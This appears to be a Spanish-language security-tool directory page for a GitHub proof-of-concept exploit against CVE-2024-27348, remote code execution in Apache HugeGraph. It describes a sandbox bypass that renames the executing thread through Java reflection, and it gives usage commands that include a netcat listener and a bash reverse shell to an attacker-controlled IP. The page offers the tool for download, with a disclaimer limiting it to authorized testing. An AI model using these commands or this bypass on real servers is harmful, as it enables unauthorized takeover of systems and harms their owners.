Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-27348-HugeGraph-RCE — Exploit PoC avanzado para CVE-2024-27348, que logra RCE confiable en Apache HugeGraph mediante omisión de sandbox y ejecución de comandos no ciega. | Kitploit
Herramientas/GitHubGitHub/akelaqe/cve-2024-27348-hugegraph-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubakelaqe/cve-2024-27348-hugegraph-rce

CVE-2024-27348-HugeGraph-RCE

Exploit PoC avanzado para CVE-2024-27348, que logra RCE confiable en Apache HugeGraph mediante omisión de sandbox y ejecución de comandos no ciega.

Ver Repositorio
12hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-27348: Apache HugeGraph RCE (Bypass Avanzado de Sandbox)

Python 3.x Exploit CVE

Un exploit de Prueba de Concepto (PoC) avanzado y altamente fiable para CVE-2024-27348 (Ejecución Remota de Código en Apache HugeGraph Server).

A diferencia de muchos PoCs públicos que ejecutan comandos a ciegas o fallan en cargas útiles complejas debido a las limitaciones de Runtime.exec() de Java, este script está diseñado para fiabilidad en escenarios reales de pruebas de penetración.

⚠️ Descargo de responsabilidad

Solo para fines educativos y pruebas autorizadas. Esta herramienta se proporciona a investigadores de seguridad, probadores de penetración y administradores de sistemas para verificar la vulnerabilidad en entornos autorizados. El autor no se hace responsable del mal uso o daños causados por esta herramienta.

✨ Características y Mejoras Técnicas

Este exploit mejora los PoCs públicos tempranos al abordar tres problemas críticos:

  1. Bypass del Sandbox de HugeSecurityManager: El sandbox de HugeGraph bloquea la ejecución si el hilo que llama se llama gremlin-server-exec-* o task-worker-*. Esta carga útil utiliza Reflexión de Java para renombrar dinámicamente el hilo de ejecución a BypassThread antes de activar la carga útil, evadiendo sin problemas el gestor de seguridad.
  2. Manejo de Cargas Útiles Complejas: En lugar de Runtime.getRuntime().exec(String), que rompe comandos bash complejos (como shells inversas) en los espacios, este exploit usa ProcessBuilder con un List<String> correctamente formateado. Esto permite la ejecución segura de cargas útiles complejas con comillas y redirecciones.
  3. Lectura Completa de Salida (RCE No Ciego): El script lee el InputStream del proceso ejecutado usando un Scanner de Java y devuelve la salida real del comando en la respuesta HTTP JSON. Ves exactamente lo que ve el servidor.

⚙️ Requisitos

  • Python 3.x
  • Librería requests

Instala las dependencias necesarias:

root@kitploit:~
pip3 install requests

🚀 Uso

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -c <COMMAND>

Ejemplos

  1. Ejecución Básica de Comandos (Lectura de salida):
root@kitploit:~
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "whoami"
  1. Generar una Shell Inversa: Debido a que la carga útil maneja espacios y comillas correctamente, puedes inyectar una shell inversa bash estándar directamente sin necesidad de codificarla en base64 o prepararla:
root@kitploit:~
# On your attacker machine, start a listener:
nc -lvnp 4444

# Execute the exploit:
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

🔍 Detalles de la Vulnerabilidad

Apache HugeGraph Server expone un endpoint de API Gremlin (/gremlin) que permite a los usuarios enviar scripts de Groovy. Debido a un sandboxing insuficiente en versiones anteriores al parche, un atacante no autenticado puede ejecutar comandos arbitrarios del sistema operativo a través de la Reflexión de Java.

Descargar herramienta